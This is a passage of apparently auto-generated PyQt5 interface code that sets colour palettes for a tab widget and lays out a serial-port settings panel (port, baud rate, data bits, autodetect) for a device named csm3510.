brush = QtGui.QBrush(QtGui.QColor(0, 0, 0))
brush.setStyle(QtCore.Qt.SolidPattern)
palette.setBrush(QtGui.QPalette.Active, QtGui.QPalette.ButtonText, brush)
brush = QtGui.QBrush(QtGui.QColor(255, 255, 255))
brush.setStyle(QtCore.Qt.SolidPattern)
palette.setBrush(QtGui.QPalette.Active, QtGui.QPalette.Base, brush)
brush = QtGui.QBrush(QtGui.QColor(255, 255, 255))
brush.setStyle(QtCore.Qt.SolidPattern)
palette.setBrush(QtGui.QPalette.Active, QtGui.QPalette.Window, brush)
brush = QtGui.QBrush(QtGui.QColor(0, 0, 0))
brush.setStyle(QtCore.Qt.SolidPattern)
palette.setBrush(QtGui.QPalette.Active, QtGui.QPalette.Shadow, brush)
brush = QtGui.QBrush(QtGui.QColor(255, 255, 255))
brush.setStyle(QtCore.Qt.SolidPattern)
palette.setBrush(QtGui.QPalette.Active, QtGui.QPalette.AlternateBase, brush)
brush = QtGui.QBrush(QtGui.QColor(255, 255, 220))
brush.setStyle(QtCore.Qt.SolidPattern)
palette.setBrush(QtGui.QPalette.Active, QtGui.QPalette.ToolTipBase, brush)
brush = QtGui.QBrush(QtGui.QColor(0, 0, 0))
brush.setStyle(QtCore.Qt.SolidPattern)
palette.setBrush(QtGui.QPalette.Active, QtGui.QPalette.ToolTipText, brush)
brush = QtGui.QBrush(QtGui.QColor(0, 0, 0))
brush.setStyle(QtCore.Qt.SolidPattern)
palette.setBrush(QtGui.QPalette.Inactive, QtGui.QPalette.WindowText, brush)
brush = QtGui.QBrush(QtGui.QColor(255, 255, 255))
brush.setStyle(QtCore.Qt.SolidPattern)
palette.setBrush(QtGui.QPalette.Inactive, QtGui.QPalette.Button, brush)
brush = QtGui.QBrush(QtGui.QColor(255, 255, 255))
brush.setStyle(QtCore.Qt.SolidPattern)
palette.setBrush(QtGui.QPalette.Inactive, QtGui.QPalette.Light, brush)
brush = QtGui.QBrush(QtGui.QColor(255, 255, 255))
brush.setStyle(QtCore.Qt.SolidPattern)
palette.setBrush(QtGui.QPalette.Inactive, QtGui.QPalette.Midlight, brush)
brush = QtGui.QBrush(QtGui.QColor(127, 127, 127))
brush.setStyle(QtCore.Qt.SolidPattern)
palette.setBrush(QtGui.QPalette.Inactive, QtGui.QPalette.Dark, brush)
brush = QtGui.QBrush(QtGui.QColor(170, 170, 170))
brush.setStyle(QtCore.Qt.SolidPattern)
palette.setBrush(QtGui.QPalette.Inactive, QtGui.QPalette.Mid, brush)
brush = QtGui.QBrush(QtGui.QColor(0, 0, 0))
brush.setStyle(QtCore.Qt.SolidPattern)
palette.setBrush(QtGui.QPalette.Inactive, QtGui.QPalette.Text, brush)
brush = QtGui.QBrush(QtGui.QColor(255, 255, 255))
brush.setStyle(QtCore.Qt.SolidPattern)
palette.setBrush(QtGui.QPalette.Inactive, QtGui.QPalette.BrightText, brush)
brush = QtGui.QBrush(QtGui.QColor(0, 0, 0))
brush.setStyle(QtCore.Qt.SolidPattern)
palette.setBrush(QtGui.QPalette.Inactive, QtGui.QPalette.ButtonText, brush)
brush = QtGui.QBrush(QtGui.QColor(255, 255, 255))
brush.setStyle(QtCore.Qt.SolidPattern)
palette.setBrush(QtGui.QPalette.Inactive, QtGui.QPalette.Base, brush)
brush = QtGui.QBrush(QtGui.QColor(255, 255, 255))
brush.setStyle(QtCore.Qt.SolidPattern)
palette.setBrush(QtGui.QPalette.Inactive, QtGui.QPalette.Window, brush)
brush = QtGui.QBrush(QtGui.QColor(0, 0, 0))
brush.setStyle(QtCore.Qt.SolidPattern)
palette.setBrush(QtGui.QPalette.Inactive, QtGui.QPalette.Shadow, brush)
brush = QtGui.QBrush(QtGui.QColor(255, 255, 255))
brush.setStyle(QtCore.Qt.SolidPattern)
palette.setBrush(QtGui.QPalette.Inactive, QtGui.QPalette.AlternateBase, brush)
brush = QtGui.QBrush(QtGui.QColor(255, 255, 220))
brush.setStyle(QtCore.Qt.SolidPattern)
palette.setBrush(QtGui.QPalette.Inactive, QtGui.QPalette.ToolTipBase, brush)
brush = QtGui.QBrush(QtGui.QColor(0, 0, 0))
brush.setStyle(QtCore.Qt.SolidPattern)
palette.setBrush(QtGui.QPalette.Inactive, QtGui.QPalette.ToolTipText, brush)
brush = QtGui.QBrush(QtGui.QColor(127, 127, 127))
brush.setStyle(QtCore.Qt.SolidPattern)
palette.setBrush(QtGui.QPalette.Disabled, QtGui.QPalette.WindowText, brush)
brush = QtGui.QBrush(QtGui.QColor(255, 255, 255))
brush.setStyle(QtCore.Qt.SolidPattern)
palette.setBrush(QtGui.QPalette.Disabled, QtGui.QPalette.Button, brush)
brush = QtGui.QBrush(QtGui.QColor(255, 255, 255))
brush.setStyle(QtCore.Qt.SolidPattern)
palette.setBrush(QtGui.QPalette.Disabled, QtGui.QPalette.Light, brush)
brush = QtGui.QBrush(QtGui.QColor(255, 255, 255))
brush.setStyle(QtCore.Qt.SolidPattern)
palette.setBrush(QtGui.QPalette.Disabled, QtGui.QPalette.Midlight, brush)
brush = QtGui.QBrush(QtGui.QColor(127, 127, 127))
brush.setStyle(QtCore.Qt.SolidPattern)
palette.setBrush(QtGui.QPalette.Disabled, QtGui.QPalette.Dark, brush)
brush = QtGui.QBrush(QtGui.QColor(170, 170, 170))
brush.setStyle(QtCore.Qt.SolidPattern)
palette.setBrush(QtGui.QPalette.Disabled, QtGui.QPalette.Mid, brush)
brush = QtGui.QBrush(QtGui.QColor(127, 127, 127))
brush.setStyle(QtCore.Qt.SolidPattern)
palette.setBrush(QtGui.QPalette.Disabled, QtGui.QPalette.Text, brush)
brush = QtGui.QBrush(QtGui.QColor(255, 255, 255))
brush.setStyle(QtCore.Qt.SolidPattern)
palette.setBrush(QtGui.QPalette.Disabled, QtGui.QPalette.BrightText, brush)
brush = QtGui.QBrush(QtGui.QColor(127, 127, 127))
brush.setStyle(QtCore.Qt.SolidPattern)
palette.setBrush(QtGui.QPalette.Disabled, QtGui.QPalette.ButtonText, brush)
brush = QtGui.QBrush(QtGui.QColor(255, 255, 255))
brush.setStyle(QtCore.Qt.SolidPattern)
palette.setBrush(QtGui.QPalette.Disabled, QtGui.QPalette.Base, brush)
brush = QtGui.QBrush(QtGui.QColor(255, 255, 255))
brush.setStyle(QtCore.Qt.SolidPattern)
palette.setBrush(QtGui.QPalette.Disabled, QtGui.QPalette.Window, brush)
brush = QtGui.QBrush(QtGui.QColor(0, 0, 0))
brush.setStyle(QtCore.Qt.SolidPattern)
palette.setBrush(QtGui.QPalette.Disabled, QtGui.QPalette.Shadow, brush)
brush = QtGui.QBrush(QtGui.QColor(255, 255, 255))
brush.setStyle(QtCore.Qt.SolidPattern)
palette.setBrush(QtGui.QPalette.Disabled, QtGui.QPalette.AlternateBase, brush)
brush = QtGui.QBrush(QtGui.QColor(255, 255, 220))
brush.setStyle(QtCore.Qt.SolidPattern)
palette.setBrush(QtGui.QPalette.Disabled, QtGui.QPalette.ToolTipBase, brush)
brush = QtGui.QBrush(QtGui.QColor(0, 0, 0))
brush.setStyle(QtCore.Qt.SolidPattern)
palette.setBrush(QtGui.QPalette.Disabled, QtGui.QPalette.ToolTipText, brush)
self.tabWidget.setPalette(palette)
self.tabWidget.setAutoFillBackground(False)
self.tabWidget.setUsesScrollButtons(True)
self.tabWidget.setMovable(True)
self.tabWidget.setObjectName("tabWidget")
self.tab_setting = QtWidgets.QWidget()
sizePolicy = QtWidgets.QSizePolicy(QtWidgets.QSizePolicy.Preferred, QtWidgets.QSizePolicy.Maximum)
sizePolicy.setHorizontalStretch(0)
sizePolicy.setVerticalStretch(0)
sizePolicy.setHeightForWidth(self.tab_setting.sizePolicy().hasHeightForWidth())
self.tab_setting.setSizePolicy(sizePolicy)
palette = QtGui.QPalette()
brush = QtGui.QBrush(QtGui.QColor(0, 0, 0))
brush.setStyle(QtCore.Qt.SolidPattern)
palette.setBrush(QtGui.QPalette.Active, QtGui.QPalette.WindowText, brush)
brush = QtGui.QBrush(QtGui.QColor(198, 200, 185))
brush.setStyle(QtCore.Qt.SolidPattern)
palette.setBrush(QtGui.QPalette.Active, QtGui.QPalette.Button, brush)
brush = QtGui.QBrush(QtGui.QColor(255, 255, 255))
brush.setStyle(QtCore.Qt.SolidPattern)
palette.setBrush(QtGui.QPalette.Active, QtGui.QPalette.Light, brush)
brush = QtGui.QBrush(QtGui.QColor(226, 227, 220))
brush.setStyle(QtCore.Qt.SolidPattern)
palette.setBrush(QtGui.QPalette.Active, QtGui.QPalette.Midlight, brush)
brush = QtGui.QBrush(QtGui.QColor(99, 100, 92))
brush.setStyle(QtCore.Qt.SolidPattern)
palette.setBrush(QtGui.QPalette.Active, QtGui.QPalette.Dark, brush)
brush = QtGui.QBrush(QtGui.QColor(132, 133, 123))
brush.setStyle(QtCore.Qt.SolidPattern)
palette.setBrush(QtGui.QPalette.Active, QtGui.QPalette.Mid, brush)
brush = QtGui.QBrush(QtGui.QColor(0, 0, 0))
brush.setStyle(QtCore.Qt.SolidPattern)
palette.setBrush(QtGui.QPalette.Active, QtGui.QPalette.Text, brush)
brush = QtGui.QBrush(QtGui.QColor(255, 255, 255))
brush.setStyle(QtCore.Qt.SolidPattern)
palette.setBrush(QtGui.QPalette.Active, QtGui.QPalette.BrightText, brush)
brush = QtGui.QBrush(QtGui.QColor(0, 0, 0))
brush.setStyle(QtCore.Qt.SolidPattern)
palette.setBrush(QtGui.QPalette.Active, QtGui.QPalette.ButtonText, brush)
brush = QtGui.QBrush(QtGui.QColor(255, 255, 255))
brush.setStyle(QtCore.Qt.SolidPattern)
palette.setBrush(QtGui.QPalette.Active, QtGui.QPalette.Base, brush)
brush = QtGui.QBrush(QtGui.QColor(198, 200, 185))
brush.setStyle(QtCore.Qt.SolidPattern)
palette.setBrush(QtGui.QPalette.Active, QtGui.QPalette.Window, brush)
brush = QtGui.QBrush(QtGui.QColor(0, 0, 0))
brush.setStyle(QtCore.Qt.SolidPattern)
palette.setBrush(QtGui.QPalette.Active, QtGui.QPalette.Shadow, brush)
brush = QtGui.QBrush(QtGui.QColor(226, 227, 220))
brush.setStyle(QtCore.Qt.SolidPattern)
palette.setBrush(QtGui.QPalette.Active, QtGui.QPalette.AlternateBase, brush)
brush = QtGui.QBrush(QtGui.QColor(255, 255, 220))
brush.setStyle(QtCore.Qt.SolidPattern)
palette.setBrush(QtGui.QPalette.Active, QtGui.QPalette.ToolTipBase, brush)
brush = QtGui.QBrush(QtGui.QColor(0, 0, 0))
brush.setStyle(QtCore.Qt.SolidPattern)
palette.setBrush(QtGui.QPalette.Active, QtGui.QPalette.ToolTipText, brush)
brush = QtGui.QBrush(QtGui.QColor(0, 0, 0))
brush.setStyle(QtCore.Qt.SolidPattern)
palette.setBrush(QtGui.QPalette.Inactive, QtGui.QPalette.WindowText, brush)
brush = QtGui.QBrush(QtGui.QColor(198, 200, 185))
brush.setStyle(QtCore.Qt.SolidPattern)
palette.setBrush(QtGui.QPalette.Inactive, QtGui.QPalette.Button, brush)
brush = QtGui.QBrush(QtGui.QColor(255, 255, 255))
brush.setStyle(QtCore.Qt.SolidPattern)
palette.setBrush(QtGui.QPalette.Inactive, QtGui.QPalette.Light, brush)
brush = QtGui.QBrush(QtGui.QColor(226, 227, 220))
brush.setStyle(QtCore.Qt.SolidPattern)
palette.setBrush(QtGui.QPalette.Inactive, QtGui.QPalette.Midlight, brush)
brush = QtGui.QBrush(QtGui.QColor(99, 100, 92))
brush.setStyle(QtCore.Qt.SolidPattern)
palette.setBrush(QtGui.QPalette.Inactive, QtGui.QPalette.Dark, brush)
brush = QtGui.QBrush(QtGui.QColor(132, 133, 123))
brush.setStyle(QtCore.Qt.SolidPattern)
palette.setBrush(QtGui.QPalette.Inactive, QtGui.QPalette.Mid, brush)
brush = QtGui.QBrush(QtGui.QColor(0, 0, 0))
brush.setStyle(QtCore.Qt.SolidPattern)
palette.setBrush(QtGui.QPalette.Inactive, QtGui.QPalette.Text, brush)
brush = QtGui.QBrush(QtGui.QColor(255, 255, 255))
brush.setStyle(QtCore.Qt.SolidPattern)
palette.setBrush(QtGui.QPalette.Inactive, QtGui.QPalette.BrightText, brush)
brush = QtGui.QBrush(QtGui.QColor(0, 0, 0))
brush.setStyle(QtCore.Qt.SolidPattern)
palette.setBrush(QtGui.QPalette.Inactive, QtGui.QPalette.ButtonText, brush)
brush = QtGui.QBrush(QtGui.QColor(255, 255, 255))
brush.setStyle(QtCore.Qt.SolidPattern)
palette.setBrush(QtGui.QPalette.Inactive, QtGui.QPalette.Base, brush)
brush = QtGui.QBrush(QtGui.QColor(198, 200, 185))
brush.setStyle(QtCore.Qt.SolidPattern)
palette.setBrush(QtGui.QPalette.Inactive, QtGui.QPalette.Window, brush)
brush = QtGui.QBrush(QtGui.QColor(0, 0, 0))
brush.setStyle(QtCore.Qt.SolidPattern)
palette.setBrush(QtGui.QPalette.Inactive, QtGui.QPalette.Shadow, brush)
brush = QtGui.QBrush(QtGui.QColor(226, 227, 220))
brush.setStyle(QtCore.Qt.SolidPattern)
palette.setBrush(QtGui.QPalette.Inactive, QtGui.QPalette.AlternateBase, brush)
brush = QtGui.QBrush(QtGui.QColor(255, 255, 220))
brush.setStyle(QtCore.Qt.SolidPattern)
palette.setBrush(QtGui.QPalette.Inactive, QtGui.QPalette.ToolTipBase, brush)
brush = QtGui.QBrush(QtGui.QColor(0, 0, 0))
brush.setStyle(QtCore.Qt.SolidPattern)
palette.setBrush(QtGui.QPalette.Inactive, QtGui.QPalette.ToolTipText, brush)
brush = QtGui.QBrush(QtGui.QColor(99, 100, 92))
brush.setStyle(QtCore.Qt.SolidPattern)
palette.setBrush(QtGui.QPalette.Disabled, QtGui.QPalette.WindowText, brush)
brush = QtGui.QBrush(QtGui.QColor(198, 200, 185))
brush.setStyle(QtCore.Qt.SolidPattern)
palette.setBrush(QtGui.QPalette.Disabled, QtGui.QPalette.Button, brush)
brush = QtGui.QBrush(QtGui.QColor(255, 255, 255))
brush.setStyle(QtCore.Qt.SolidPattern)
palette.setBrush(QtGui.QPalette.Disabled, QtGui.QPalette.Light, brush)
brush = QtGui.QBrush(QtGui.QColor(226, 227, 220))
brush.setStyle(QtCore.Qt.SolidPattern)
palette.setBrush(QtGui.QPalette.Disabled, QtGui.QPalette.Midlight, brush)
brush = QtGui.QBrush(QtGui.QColor(99, 100, 92))
brush.setStyle(QtCore.Qt.SolidPattern)
palette.setBrush(QtGui.QPalette.Disabled, QtGui.QPalette.Dark, brush)
brush = QtGui.QBrush(QtGui.QColor(132, 133, 123))
brush.setStyle(QtCore.Qt.SolidPattern)
palette.setBrush(QtGui.QPalette.Disabled, QtGui.QPalette.Mid, brush)
brush = QtGui.QBrush(QtGui.QColor(99, 100, 92))
brush.setStyle(QtCore.Qt.SolidPattern)
palette.setBrush(QtGui.QPalette.Disabled, QtGui.QPalette.Text, brush)
brush = QtGui.QBrush(QtGui.QColor(255, 255, 255))
brush.setStyle(QtCore.Qt.SolidPattern)
palette.setBrush(QtGui.QPalette.Disabled, QtGui.QPalette.BrightText, brush)
brush = QtGui.QBrush(QtGui.QColor(99, 100, 92))
brush.setStyle(QtCore.Qt.SolidPattern)
palette.setBrush(QtGui.QPalette.Disabled, QtGui.QPalette.ButtonText, brush)
brush = QtGui.QBrush(QtGui.QColor(198, 200, 185))
brush.setStyle(QtCore.Qt.SolidPattern)
palette.setBrush(QtGui.QPalette.Disabled, QtGui.QPalette.Base, brush)
brush = QtGui.QBrush(QtGui.QColor(198, 200, 185))
brush.setStyle(QtCore.Qt.SolidPattern)
palette.setBrush(QtGui.QPalette.Disabled, QtGui.QPalette.Window, brush)
brush = QtGui.QBrush(QtGui.QColor(0, 0, 0))
brush.setStyle(QtCore.Qt.SolidPattern)
palette.setBrush(QtGui.QPalette.Disabled, QtGui.QPalette.Shadow, brush)
brush = QtGui.QBrush(QtGui.QColor(198, 200, 185))
brush.setStyle(QtCore.Qt.SolidPattern)
palette.setBrush(QtGui.QPalette.Disabled, QtGui.QPalette.AlternateBase, brush)
brush = QtGui.QBrush(QtGui.QColor(255, 255, 220))
brush.setStyle(QtCore.Qt.SolidPattern)
palette.setBrush(QtGui.QPalette.Disabled, QtGui.QPalette.ToolTipBase, brush)
brush = QtGui.QBrush(QtGui.QColor(0, 0, 0))
brush.setStyle(QtCore.Qt.SolidPattern)
palette.setBrush(QtGui.QPalette.Disabled, QtGui.QPalette.ToolTipText, brush)
self.tab_setting.setPalette(palette)
self.tab_setting.setObjectName("tab_setting")
self.gridLayout_7 = QtWidgets.QGridLayout(self.tab_setting)
self.gridLayout_7.setObjectName("gridLayout_7")
self.horizontalLayout_11 = QtWidgets.QHBoxLayout()
self.horizontalLayout_11.setObjectName("horizontalLayout_11")
self.horizontalLayout_12 = QtWidgets.QHBoxLayout()
self.horizontalLayout_12.setSpacing(0)
self.horizontalLayout_12.setObjectName("horizontalLayout_12")
self.label_3 = QtWidgets.QLabel(self.tab_setting)
self.label_3.setText("")
self.label_3.setObjectName("label_3")
self.horizontalLayout_12.addWidget(self.label_3)
self.horizontalLayout_11.addLayout(self.horizontalLayout_12)
self.gridLayout_12 = QtWidgets.QGridLayout()
self.gridLayout_12.setContentsMargins(10, -1, 10, -1)
self.gridLayout_12.setObjectName("gridLayout_12")
self.verticalLayout = QtWidgets.QVBoxLayout()
self.verticalLayout.setObjectName("verticalLayout")
self.verticalLayout_8 = QtWidgets.QVBoxLayout()
self.verticalLayout_8.setContentsMargins(-1, -1, -1, 15)
self.verticalLayout_8.setObjectName("verticalLayout_8")
self.csm3510_head_text = QtWidgets.QLineEdit(self.tab_setting)
self.csm3510_head_text.setEnabled(False)
palette = QtGui.QPalette()
brush = QtGui.QBrush(QtGui.QColor(0, 0, 0))
brush.setStyle(QtCore.Qt.SolidPattern)
palette.setBrush(QtGui.QPalette.Active, QtGui.QPalette.WindowText, brush)
brush = QtGui.QBrush(QtGui.QColor(255, 255, 255))
brush.setStyle(QtCore.Qt.SolidPattern)
palette.setBrush(QtGui.QPalette.Active, QtGui.QPalette.Button, brush)
brush = QtGui.QBrush(QtGui.QColor(255, 255, 255))
brush.setStyle(QtCore.Qt.SolidPattern)
palette.setBrush(QtGui.QPalette.Active, QtGui.QPalette.Light, brush)
brush = QtGui.QBrush(QtGui.QColor(255, 255, 255))
brush.setStyle(QtCore.Qt.SolidPattern)
palette.setBrush(QtGui.QPalette.Active, QtGui.QPalette.Midlight, brush)
brush = QtGui.QBrush(QtGui.QColor(127, 127, 127))
brush.setStyle(QtCore.Qt.SolidPattern)
palette.setBrush(QtGui.QPalette.Active, QtGui.QPalette.Dark, brush)
brush = QtGui.QBrush(QtGui.QColor(170, 170, 170))
brush.setStyle(QtCore.Qt.SolidPattern)
palette.setBrush(QtGui.QPalette.Active, QtGui.QPalette.Mid, brush)
brush = QtGui.QBrush(QtGui.QColor(0, 0, 0))
brush.setStyle(QtCore.Qt.SolidPattern)
palette.setBrush(QtGui.QPalette.Active, QtGui.QPalette.Text, brush)
brush = QtGui.QBrush(QtGui.QColor(255, 255, 255))
brush.setStyle(QtCore.Qt.SolidPattern)
palette.setBrush(QtGui.QPalette.Active, QtGui.QPalette.BrightText, brush)
brush = QtGui.QBrush(QtGui.QColor(0, 0, 0))
brush.setStyle(QtCore.Qt.SolidPattern)
palette.setBrush(QtGui.QPalette.Active, QtGui.QPalette.ButtonText, brush)
brush = QtGui.QBrush(QtGui.QColor(255, 255, 255))
brush.setStyle(QtCore.Qt.SolidPattern)
palette.setBrush(QtGui.QPalette.Active, QtGui.QPalette.Base, brush)
brush = QtGui.QBrush(QtGui.QColor(255, 255, 255))
brush.setStyle(QtCore.Qt.SolidPattern)
palette.setBrush(QtGui.QPalette.Active, QtGui.QPalette.Window, brush)
brush = QtGui.QBrush(QtGui.QColor(0, 0, 0))
brush.setStyle(QtCore.Qt.SolidPattern)
palette.setBrush(QtGui.QPalette.Active, QtGui.QPalette.Shadow, brush)
brush = QtGui.QBrush(QtGui.QColor(255, 255, 255))
brush.setStyle(QtCore.Qt.SolidPattern)
palette.setBrush(QtGui.QPalette.Active, QtGui.QPalette.AlternateBase, brush)
brush = QtGui.QBrush(QtGui.QColor(255, 255, 220))
brush.setStyle(QtCore.Qt.SolidPattern)
palette.setBrush(QtGui.QPalette.Active, QtGui.QPalette.ToolTipBase, brush)
brush = QtGui.QBrush(QtGui.QColor(0, 0, 0))
brush.setStyle(QtCore.Qt.SolidPattern)
palette.setBrush(QtGui.QPalette.Active, QtGui.QPalette.ToolTipText, brush)
brush = QtGui.QBrush(QtGui.QColor(0, 0, 0))
brush.setStyle(QtCore.Qt.SolidPattern)
palette.setBrush(QtGui.QPalette.Inactive, QtGui.QPalette.WindowText, brush)
brush = QtGui.QBrush(QtGui.QColor(255, 255, 255))
brush.setStyle(QtCore.Qt.SolidPattern)
palette.setBrush(QtGui.QPalette.Inactive, QtGui.QPalette.Button, brush)
brush = QtGui.QBrush(QtGui.QColor(255, 255, 255))
brush.setStyle(QtCore.Qt.SolidPattern)
palette.setBrush(QtGui.QPalette.Inactive, QtGui.QPalette.Light, brush)
brush = QtGui.QBrush(QtGui.QColor(255, 255, 255))
brush.setStyle(QtCore.Qt.SolidPattern)
palette.setBrush(QtGui.QPalette.Inactive, QtGui.QPalette.Midlight, brush)
brush = QtGui.QBrush(QtGui.QColor(127, 127, 127))
brush.setStyle(QtCore.Qt.SolidPattern)
palette.setBrush(QtGui.QPalette.Inactive, QtGui.QPalette.Dark, brush)
brush = QtGui.QBrush(QtGui.QColor(170, 170, 170))
brush.setStyle(QtCore.Qt.SolidPattern)
palette.setBrush(QtGui.QPalette.Inactive, QtGui.QPalette.Mid, brush)
brush = QtGui.QBrush(QtGui.QColor(0, 0, 0))
brush.setStyle(QtCore.Qt.SolidPattern)
palette.setBrush(QtGui.QPalette.Inactive, QtGui.QPalette.Text, brush)
brush = QtGui.QBrush(QtGui.QColor(255, 255, 255))
brush.setStyle(QtCore.Qt.SolidPattern)
palette.setBrush(QtGui.QPalette.Inactive, QtGui.QPalette.BrightText, brush)
brush = QtGui.QBrush(QtGui.QColor(0, 0, 0))
brush.setStyle(QtCore.Qt.SolidPattern)
palette.setBrush(QtGui.QPalette.Inactive, QtGui.QPalette.ButtonText, brush)
brush = QtGui.QBrush(QtGui.QColor(255, 255, 255))
brush.setStyle(QtCore.Qt.SolidPattern)
palette.setBrush(QtGui.QPalette.Inactive, QtGui.QPalette.Base, brush)
brush = QtGui.QBrush(QtGui.QColor(255, 255, 255))
brush.setStyle(QtCore.Qt.SolidPattern)
palette.setBrush(QtGui.QPalette.Inactive, QtGui.QPalette.Window, brush)
brush = QtGui.QBrush(QtGui.QColor(0, 0, 0))
brush.setStyle(QtCore.Qt.SolidPattern)
palette.setBrush(QtGui.QPalette.Inactive, QtGui.QPalette.Shadow, brush)
brush = QtGui.QBrush(QtGui.QColor(255, 255, 255))
brush.setStyle(QtCore.Qt.SolidPattern)
palette.setBrush(QtGui.QPalette.Inactive, QtGui.QPalette.AlternateBase, brush)
brush = QtGui.QBrush(QtGui.QColor(255, 255, 220))
brush.setStyle(QtCore.Qt.SolidPattern)
palette.setBrush(QtGui.QPalette.Inactive, QtGui.QPalette.ToolTipBase, brush)
brush = QtGui.QBrush(QtGui.QColor(0, 0, 0))
brush.setStyle(QtCore.Qt.SolidPattern)
palette.setBrush(QtGui.QPalette.Inactive, QtGui.QPalette.ToolTipText, brush)
brush = QtGui.QBrush(QtGui.QColor(127, 127, 127))
brush.setStyle(QtCore.Qt.SolidPattern)
palette.setBrush(QtGui.QPalette.Disabled, QtGui.QPalette.WindowText, brush)
brush = QtGui.QBrush(QtGui.QColor(255, 255, 255))
brush.setStyle(QtCore.Qt.SolidPattern)
palette.setBrush(QtGui.QPalette.Disabled, QtGui.QPalette.Button, brush)
brush = QtGui.QBrush(QtGui.QColor(255, 255, 255))
brush.setStyle(QtCore.Qt.SolidPattern)
palette.setBrush(QtGui.QPalette.Disabled, QtGui.QPalette.Light, brush)
brush = QtGui.QBrush(QtGui.QColor(255, 255, 255))
brush.setStyle(QtCore.Qt.SolidPattern)
palette.setBrush(QtGui.QPalette.Disabled, QtGui.QPalette.Midlight, brush)
brush = QtGui.QBrush(QtGui.QColor(127, 127, 127))
brush.setStyle(QtCore.Qt.SolidPattern)
palette.setBrush(QtGui.QPalette.Disabled, QtGui.QPalette.Dark, brush)
brush = QtGui.QBrush(QtGui.QColor(170, 170, 170))
brush.setStyle(QtCore.Qt.SolidPattern)
palette.setBrush(QtGui.QPalette.Disabled, QtGui.QPalette.Mid, brush)
brush = QtGui.QBrush(QtGui.QColor(127, 127, 127))
brush.setStyle(QtCore.Qt.SolidPattern)
palette.setBrush(QtGui.QPalette.Disabled, QtGui.QPalette.Text, brush)
brush = QtGui.QBrush(QtGui.QColor(255, 255, 255))
brush.setStyle(QtCore.Qt.SolidPattern)
palette.setBrush(QtGui.QPalette.Disabled, QtGui.QPalette.BrightText, brush)
brush = QtGui.QBrush(QtGui.QColor(127, 127, 127))
brush.setStyle(QtCore.Qt.SolidPattern)
palette.setBrush(QtGui.QPalette.Disabled, QtGui.QPalette.ButtonText, brush)
brush = QtGui.QBrush(QtGui.QColor(255, 255, 255))
brush.setStyle(QtCore.Qt.SolidPattern)
palette.setBrush(QtGui.QPalette.Disabled, QtGui.QPalette.Base, brush)
brush = QtGui.QBrush(QtGui.QColor(255, 255, 255))
brush.setStyle(QtCore.Qt.SolidPattern)
palette.setBrush(QtGui.QPalette.Disabled, QtGui.QPalette.Window, brush)
brush = QtGui.QBrush(QtGui.QColor(0, 0, 0))
brush.setStyle(QtCore.Qt.SolidPattern)
palette.setBrush(QtGui.QPalette.Disabled, QtGui.QPalette.Shadow, brush)
brush = QtGui.QBrush(QtGui.QColor(255, 255, 255))
brush.setStyle(QtCore.Qt.SolidPattern)
palette.setBrush(QtGui.QPalette.Disabled, QtGui.QPalette.AlternateBase, brush)
brush = QtGui.QBrush(QtGui.QColor(255, 255, 220))
brush.setStyle(QtCore.Qt.SolidPattern)
palette.setBrush(QtGui.QPalette.Disabled, QtGui.QPalette.ToolTipBase, brush)
brush = QtGui.QBrush(QtGui.QColor(0, 0, 0))
brush.setStyle(QtCore.Qt.SolidPattern)
palette.setBrush(QtGui.QPalette.Disabled, QtGui.QPalette.ToolTipText, brush)
self.csm3510_head_text.setPalette(palette)
font = QtGui.QFont()
font.setFamily("Microsoft YaHei")
font.setPointSize(16)
self.csm3510_head_text.setFont(font)
self.csm3510_head_text.setLayoutDirection(QtCore.Qt.LeftToRight)
self.csm3510_head_text.setAlignment(QtCore.Qt.AlignCenter)
self.csm3510_head_text.setReadOnly(True)
self.csm3510_head_text.setObjectName("csm3510_head_text")
self.verticalLayout_8.addWidget(self.csm3510_head_text)
self.horizontalLayout_5 = QtWidgets.QHBoxLayout()
self.horizontalLayout_5.setObjectName("horizontalLayout_5")
self.verticalLayout_9 = QtWidgets.QVBoxLayout()
self.verticalLayout_9.setObjectName("verticalLayout_9")
self.lineEdit_16 = QtWidgets.QLineEdit(self.tab_setting)
self.lineEdit_16.setEnabled(False)
self.lineEdit_16.setLayoutDirection(QtCore.Qt.LeftToRight)
self.lineEdit_16.setAlignment(QtCore.Qt.AlignCenter)
self.lineEdit_16.setReadOnly(True)
self.lineEdit_16.setObjectName("lineEdit_16")
self.verticalLayout_9.addWidget(self.lineEdit_16)
self.lineEdit_17 = QtWidgets.QLineEdit(self.tab_setting)
self.lineEdit_17.setEnabled(False)
self.lineEdit_17.setAlignment(QtCore.Qt.AlignCenter)
self.lineEdit_17.setReadOnly(True)
self.lineEdit_17.setObjectName("lineEdit_17")
self.verticalLayout_9.addWidget(self.lineEdit_17)
self.lineEdit_18 = QtWidgets.QLineEdit(self.tab_setting)
self.lineEdit_18.setEnabled(False)
self.lineEdit_18.setAlignment(QtCore.Qt.AlignCenter)
self.lineEdit_18.setReadOnly(True)
self.lineEdit_18.setObjectName("lineEdit_18")
self.verticalLayout_9.addWidget(self.lineEdit_18)
self.btn_csm3510_setting = QtWidgets.QPushButton(self.tab_setting)
self.btn_csm3510_setting.setObjectName("btn_csm3510_setting")
self.verticalLayout_9.addWidget(self.btn_csm3510_setting)
self.horizontalLayout_5.addLayout(self.verticalLayout_9)
self.verticalLayout_10 = QtWidgets.QVBoxLayout()
self.verticalLayout_10.setObjectName("verticalLayout_10")
self.csm3510_comboBox_port = QtWidgets.QComboBox(self.tab_setting)
self.csm3510_comboBox_port.setEditable(True)
self.csm3510_comboBox_port.setObjectName("csm3510_comboBox_port")
self.verticalLayout_10.addWidget(self.csm3510_comboBox_port)
self.csm3510_comboBox_baudrate = QtWidgets.QComboBox(self.tab_setting)
self.csm3510_comboBox_baudrate.setObjectName("csm3510_comboBox_baudrate")
self.verticalLayout_10.addWidget(self.csm3510_comboBox_baudrate)
self.csm3510_comboBox_databits = QtWidgets.QComboBox(self.tab_setting)
sizePolicy = QtWidgets.QSizePolicy(QtWidgets.QSizePolicy.Preferred, QtWidgets.QSizePolicy.Fixed)
sizePolicy.setHorizontalStretch(0)
sizePolicy.setVerticalStretch(0)
sizePolicy.setHeightForWidth(self.csm3510_comboBox_databits.sizePolicy().hasHeightForWidth())
self.csm3510_comboBox_databits.setSizePolicy(sizePolicy)
self.csm3510_comboBox_databits.setObjectName("csm3510_comboBox_databits")
self.verticalLayout_10.addWidget(self.csm3510_comboBox_databits)
self.btn_csm3510_autodetect = QtWidgets.QPushButton(self.tab_setting)
self.btn_csm3510_autodetect.setObjectName("btn_csm3510_autodetect")
self.verticalLayout_10.addWidget(self.btn_csm3510_autodetect)
self.horizontalLayout_5.addLayout(self.verticalLayout_10)
self.horizontalLayout_5.setStretch(0, 1)
